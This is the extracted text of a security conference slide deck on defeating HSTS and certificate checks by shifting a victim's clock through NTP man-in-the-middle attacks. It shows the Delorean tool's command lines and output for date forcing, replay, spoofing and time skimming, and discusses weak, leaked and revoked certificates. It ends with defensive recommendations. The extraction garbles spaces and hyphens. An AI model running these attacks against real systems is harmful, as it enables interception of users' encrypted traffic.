Breaking SSL using time synchronisation attacks
Preview:
Citation preview
- 1. Breaking SSL using time synchronisation attacks Jose Selvi,
Senior Security Consultant
- 2. $ whois jselvi Jose%Selvi% +10%years%working%in%security%
Senior%Security%Consultant% SANS%Institute%Community%Instructor%
GIAC%Security%Expert%(GSE)% Twitter:%@JoseSelvi%
Blog:%http://www.pentester.es
- 3. Valencia: Beach, Sun & Hacking
- 4. Valencia: Beach, Sun & Hacking
- 5. Whats the time?
- 6. Disclaimer
- 7. Lets Go! Starting from the beginning HTTP Strict Transport
Security Get in a Delorean Modern Time Synchronisation More attacks
Windows task scheduler Public Key Infrastructure Conclusions &
Recommendations
- 8. HTTP Strict Transport Security RFCK6797:%November%2012.%
Also%known%as%HSTS%or%STS.% Prevent%HTTP%connections.%
Prevent%accepting%selfKsigned%and% rogue%certificates.%
Use%a%new%StrictKTransportKSecurity% header.
- 9. How it work? Server HTTPS GET / HTTP/1.1 Client
Strict-Transport-Security: max- age=3153600
- 10. HSTS Timeline HTTPS connection 3153600 secs later
- 11. Preloaded HSTS Hardcoded%list%of%well%known%
website%names%that%should%always% use%HTTPS.%
Prevent%the%security%gap%before% the%first%HTTPS%connection.%
Google,%Twitter,%Paypal,%
- 12. HTTPS connection 3153600 secs later
- 13. 3153600 secs later
- 14. Preloaded HSTS - Google http://www.chromium.org/sts
- 15. Preloaded HSTS - Mozilla
https://blog.mozilla.org/security/2012/11/01/preloading-hsts/
- 16. Preloaded HSTS - Others
- 17. Chromium Source Code
- 18. Safari plist $%plutil%Kp%HSTS.plist {
%%"com.apple.CFNetwork.defaultStorageSession"%=>%{
%%%%"ssl.googleKanalytics.com"%=>%Kinf
%%%%"webmail.mayfirst.org"%=>%Kinf
%%%%"braintreegateway.com"%=>%Kinf
%%%%"code.google.com"%=>%Kinf %%%%"dm.mylookout.com"%=>%inf
%%%%"therapynotes.com"%=>%inf %%%%"chrome.google.com"%=>%Kinf
%%%%"sol.io"%=>%Kinf %%%%"www.sandbox.mydigipass.com"%=>%inf
[]
- 19. HSTS weakness Its%security%relies%on%time.%
It%completely%trust%the%OSs% current%time.%
What%if%I%could%change%the% computer%clock%from%the% network?
- 20. Lets Go! Starting from the beginning HTTP Strict Transport
Security Get in a Delorean Modern Time Synchronisation More attacks
Windows task scheduler Public Key Infrastructure Conclusions &
Recommendations
- 21. Network Time Protocol (NTP) Time%Synchronisation%Services.%
RFCK1305%(v3)%/%RFCK5905%(v4)%/%RFCK4330% (SNTPv4).%
By%default%in%(almost)%all%operating%systems.%
No%secured%by%default.%
Vulnerable%to%ManKinKtheKMiddle%attacks.
- 22. NTP Packet: Ubuntu
- 23. Delorean NTP%MitM%Tool.%Free.%Open%Source.%Python.%
http://github.com/PentesterES/Delorean% Based%on%a%kimiflys%work:%
http://github.com/limifly/ntpserver% Implements%several%attacks.%
It%pretends%to%be%an%NTP%attack%suite.
- 24. Delorean $%./delorean.py%Kh% Usage:%delorean.py%[options]%
Options:% %%Kh,%KKhelp%%%%%%%%%%%%show%this%help%message%and%exit%
%%Ki%INTERFACE,%KKinterface=INTERFACE%
%%%%%%%%%%%%%%%%%%%%%%%%Listening%interface%
%%Kp%PORT,%KKport=PORT%%Listening%port%
%%Kn,%KKnobanner%%%%%%%%Not%show%Delorean%banner%
%%Ks%STEP,%KKforceKstep=STEP%
%%%%%%%%%%%%%%%%%%%%%%%%Force%the%time%step:%3m%(minutes),%4d%(days),%1M%
%%%%%%%%%%%%%%%%%%%%%%%%(month)% %%Kd%DATE,%KKforceKdate=DATE%
%%%%%%%%%%%%%%%%%%%%%%%%Force%the%date:%YYYYKMMKDD%hh:mm[:ss]%
%%Kx,%KKrandomKdate%%%%%Use%random%date%each%time
- 25. Basic attacks #%./delorean.py%Kn%
[19:44:42]%Sent%to%192.168.10.113:123%K%Going%to%the%future!%2018K08K31%19:44%
[19:45:18]%Sent%to%192.168.10.113:123%K%Going%to%the%future!%2018K08K31%19:45
#%./delorean.py%Kd%2020K08K01%23:15%Kn%
[19:49:50]%Sent%to%127.0.0.1:48473%K%Going%to%the%future!%2020K08K01%21:15%
[19:50:10]%Sent%to%127.0.0.1:52406%K%Going%to%the%future!%2020K08K01%21:15
#%./delorean.py%Kr%Kx%
[19:51:17]%Sent%to%127.0.0.1:37680%K%Going%to%the%future!%2023K07K19%20:48%
[19:51:21]%Sent%to%127.0.0.1:37680%K%Going%to%the%future!%2019K03K12%10:11
#%./delorean.py%Ks%10d%Kn%
[19:46:09]%Sent%to%192.168.10.113:123%K%Going%to%the%future!%2015K08K10%19:46%
[19:47:19]%Sent%to%192.168.10.113:123%K%Going%to%the%future!%2015K08K10%19:47
- 26. DEMO
- 27. Replay Attack $%./delorean.py%Kn%Kr%capture.pcap%
[06:19:13]%Replayed%to%192.168.10.105:39895%K%Going%to%the%past!%2015K06K24%21:41%
[06:19:17]%Replayed%to%192.168.10.105:39895%K%Going%to%the%past!%2015K06K24%21:41
- 28. Spoofing Attack
$%./delorean.py%Kn%Kf%192.168.10.10%Ko%8.8.8.8%Kr%capture.pcap%%
Flooding%to%192.168.10.10%
$%tcpdump%Knn%Kp%Ki%eth1%host%192.168.10.10%
tcpdump:%verbose%output%suppressed,%use%Kv%or%Kvv%for%full%protocol%decode%
listening%on%eth1,%linkKtype%EN10MB%(Ethernet),%capture%size%65535%bytes%
08:26:07.621412%IP%8.8.8.8.123%>%192.168.10.10.123:%NTPv4,%Server,%length%48%
08:26:07.682578%IP%8.8.8.8.123%>%192.168.10.10.123:%NTPv4,%Server,%length%48%
08:26:07.761407%IP%8.8.8.8.123%>%192.168.10.10.123:%NTPv4,%Server,%length%48%
08:26:07.766434%IP%8.8.8.8.123%>%192.168.10.10.123:%NTPv4,%Server,%length%48%
08:26:07.843923%IP%8.8.8.8.123%>%192.168.10.10.123:%NTPv4,%Server,%length%48%
08:26:07.905666%IP%8.8.8.8.123%>%192.168.10.10.123:%NTPv4,%Server,%length%48%
08:26:07.922923%IP%8.8.8.8.123%>%192.168.10.10.123:%NTPv4,%Server,%length%48
- 29. Anti replaying
- 30. Lets Go! Starting from the beginning HTTP Strict Transport
Security Get in a Delorean Modern Time Synchronisation More attacks
Windows task scheduler Public Key Infrastructure Conclusions &
Recommendations
- 31. Ubuntu Linux Very%simple% NTPv4.%
Each%time%it%connects%to%a%network%(and%at% boot%time,%of%course).
$%ls%/etc/network/ifKup.d/%
000resolvconf%%avahiKdaemon%%ntpdate%%wpasupplicant%
avahiKautoipd%%%ethtool%%%%%%%%%%%%%upstart
- 32. Fedora Linux The%easiest% NTPv3.% More%than%one%NTP%server%
Requests%each%minute! $%tcpdump%Ki%eth0%Knn%src%port%123%
12:43:50.614191%IP%192.168.1.101.123%>%89.248.106.98.123:%NTPv3,%Client,%length%48%
12:44:55.696390%IP%192.168.1.101.123%>%213.194.159.3.123:%NTPv3,%Client,%length%48%
12:45:59.034059%IP%192.168.1.101.123%>%89.248.106.98.123:%NTPv3,%Client,%length%48
- 33. Mac OS X - Mavericks New%synchronisation%service%
NTP%daemon%exits,%but%not%synchronises.%
Just%writes%in%/var/db/ntp.drift%
A%new%service%called%pacemaker%check%
that%file%and%change%the%clock.%
It%seems%it%doesnt%work%as%it%should
http://www.atmythoughts.com/livingKinKaKtechKfamilyKblog/2014/2/28/whatKtimeKisKit
- 34. Does NTP work?
- 35. /usr/libexec/ntpd-wrapper
- 36. Mac OS X - Mavericks
- 37. Windows NTPv3%but% The%most%secure.%
Synchronisation%each%7%days.%
More%than%15%hours%drift%isnt%allowed.%
Domain%members%work%in%a%different% way.
- 38. W32time service
- 39. Max[Pos|Neg]PhaseCorrection W7 / W8 15 hours W2K12 48
hours
- 40. What the Internet says?
- 41. Time Skimming Attack 3153600 secs later Time Sync
- 42. Time Skimming Attack 3153600 secs later Time Sync
- 43. Time Skimming Attack #%./delorean.py%Kk%15h%Kt%10s%Kn%
[21:57:26]%Sent%to%192.168.10.105:123%K%Going%to%the%future!%2015K06K11%12:57%
[21:57:33]%Sent%to%192.168.10.105:123%K%Going%to%the%future!%2015K06K12%03:57%
[21:57:37]%Sent%to%192.168.10.105:123%K%Going%to%the%future!%2015K06K12%18:56%
[21:57:44]%Sent%to%192.168.10.105:123%K%Going%to%the%future!%2015K06K13%09:56%
[21:57:50]%Sent%to%192.168.10.105:123%K%Going%to%the%future!%2015K06K14%00:56%
[21:57:58]%Sent%to%192.168.10.105:123%K%Going%to%the%future!%2015K06K14%15:56%
[21:58:04]%Sent%to%192.168.10.105:123%K%Going%to%the%future!%2015K06K15%06:56%
[21:58:11]%Sent%to%192.168.10.105:123%K%Going%to%the%future!%2015K06K15%21:56%
[21:58:17]%Sent%to%192.168.10.105:123%K%Going%to%the%future!%2015K06K16%12:56
- 44. DEMO
- 45. Manual Synchronisation
- 46. Not a silver bullet
- 47. Lots of things goes wrong
- 48. Lets Go! Starting from the beginning HTTP Strict Transport
Security Get in a Delorean Modern Time Synchronisation More attacks
Windows task scheduler Public Key Infrastructure Conclusions &
Recommendations
- 49. Task scheduler
- 50. Windows automatic updates
- 51. Lets Go! Starting from the beginning HTTP Strict Transport
Security Get in a Delorean Modern Time Synchronisation More attacks
Windows task scheduler Public Key Infrastructure Conclusions &
Recommendations
- 52. PKI, CAs & Certificates
- 53. Certificates from the past Data: Version: 3 (0x2) Serial
Number: 5d:9e:f1:65:7f:f4:0c:14:e4:19:46:87:0b:b3:7b:fc Signature
Algorithm: sha1WithRSAEncryption Issuer: C=US, ST=UT, L=Salt Lake
City, O=The USERTRUST Network, OU=http://www.usertrust.com,
CN=UTN-USERFirst-Hardware Validity Not Before: Sep 19 00:00:00 2008
GMT Not After : Nov 22 23:59:59 2010 GMT Subject: O=The SANS
Institute, OU=Network Operations Center (NOC), OU=Comodo PremiumSSL
Wildcard, CN=*.sans.org
- 54. Edo Tensei no Jutsu!
- 55. Weak certificates https://www.eff.org/observatory
- 56. Looking around Las Vegas
- 57. Lets look any other
- 58. cado-nfs + ec2 in action
- 59. DEMO
- 60. Leaked certificates Certificate: Data: Version: 3 (0x2)
Serial Number: 05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56
Signature Algorithm: sha1WithRSAEncryption Issuer: emailAddress =
info@diginotar.nl commonName = DigiNotar Public CA 2025
organizationName = DigiNotar countryName = NL Validity Not Before:
Jul 10 19:06:30 2011 GMT Not After : Jul 9 19:06:30 2013 GMT
Subject: commonName = *.google.com serialNumber = PK000229200002
localityName = Mountain View organizationName = Google Inc
countryName = US Subject Public Key Info: Public Key Algorithm:
rsaEncryption RSA Public Key: (2048 bit) Modulus (2048 bit):
- 61. Heartbleed
- 62. Debian PRNG
- 63. Certificate Chain
- 64. Revocation lists Revoked Certificates: Serial Number:
08CA22CD4F70A626B07C7A4DB75494FA Revocation Date: Nov 21 16:46:04
2013 GMT Serial Number: 017D4D9DF57B784B5D7DF0B9D450D37E Revocation
Date: Nov 21 16:46:04 2013 GMT Serial Number:
061AD6AD34F67938C0870AAF74FC041A Revocation Date: Nov 21 17:16:03
2013 GMT Serial Number: 0FBBD7921F710C02FD9AFF2D4DDCDF12 Revocation
Date: Nov 21 17:28:02 2013 GMT Serial Number:
0656A344CD735B2C52858A4A2AF96EE6 Revocation Date: Nov 21 18:23:02
2013 GMT Serial Number: 0F0C3DC4EE1229E280938DF6A889B178 Revocation
Date: Nov 22 07:21:03 2013 GMT Serial Number:
0536AC86E884BE1773A78D4D232691A5 Revocation Date: Nov 22 09:52:05
2013 GMT Serial Number: 0335D45DC4E571A37BDE1869B44C1306 Revocation
Date: Nov 24 00:45:02 2013 GMT
- 65. A CRL over the years
- 66. Purged CRLs???
- 67. Purged CRLs??? CRL Issued%date Oldest%revoked
DigiCert%SHA2%Extended%Validation%Server%CA% (Dropbox,%GitHub)
22/Oct/2013 13/Dec/2013% (330%certs) DigiCert%High%Assurance%CAK3%
(Facebook) 02/Apr/2008% 14/Jun/2012% 27/Sep/2014
GeoTrust%Global%CA% (Google) 20/May/2002 21/May/2002% (9%certs)
GlobalSign%Organization%Validation%CA%K% SHA256%K%G2%(LogmeIn)
20/Feb/2014% 31/Mar/2014% (637%certs)
VeriSign%Class%3%Extended%Validation%SSL%CA%
(Microsoft,%Paypal,%Twitter) 08/Nov/2006% 04/Dec/2012% (1709%certs)
VeriSign%Class%3%Secure%Server%CA%K%G3% (Yahoo) 07/Feb/2010
10/Oct/2010% (41120%certs)
- 68. Online Certificate Status Protocol
- 69. What if I cant connect?
https://www.grc.com/revocation/implementations.htm
- 70. DEMO
- 71. Lets Go! Starting from the beginning HTTP Strict Transport
Security Get in a Delorean Modern Time Synchronisation More attacks
Windows task scheduler Public Key Infrastructure Conclusions &
Recommendations
- 72. Conclusions & Recommendations Facts Time
synchronisation isnt managed securely by most operating system
vendors. Many security protections relies in time. If an attacker
can control the local clock, lots of things can go wrong. What to
do Configure NTP synchronisation in a secure way (Microsoft does):
Signature. Maximum drift. Block SSL certificates which expiry date
is before the browser build date or the last update (Chrome
does).
- 73. Special thanks to Pedro Candel (my leaked certs dealer).
Juan Garrido (microsoft guru). Tom Ritter (my factoring mentor).
All the NCC Group guys and resources. /mode +nostalgic JoseSelvi
People who created the Back to the Future saga, War Games, and all
those amazing 80s movies and series :)
- 74. 71 Jose Selvi http://twitter.com/JoseSelvi
jselvi@pentester.es http://www.pentester.es
Jose.Selvi@nccgroup.trust http://www.nccgroup.trust Thanks!
Questions?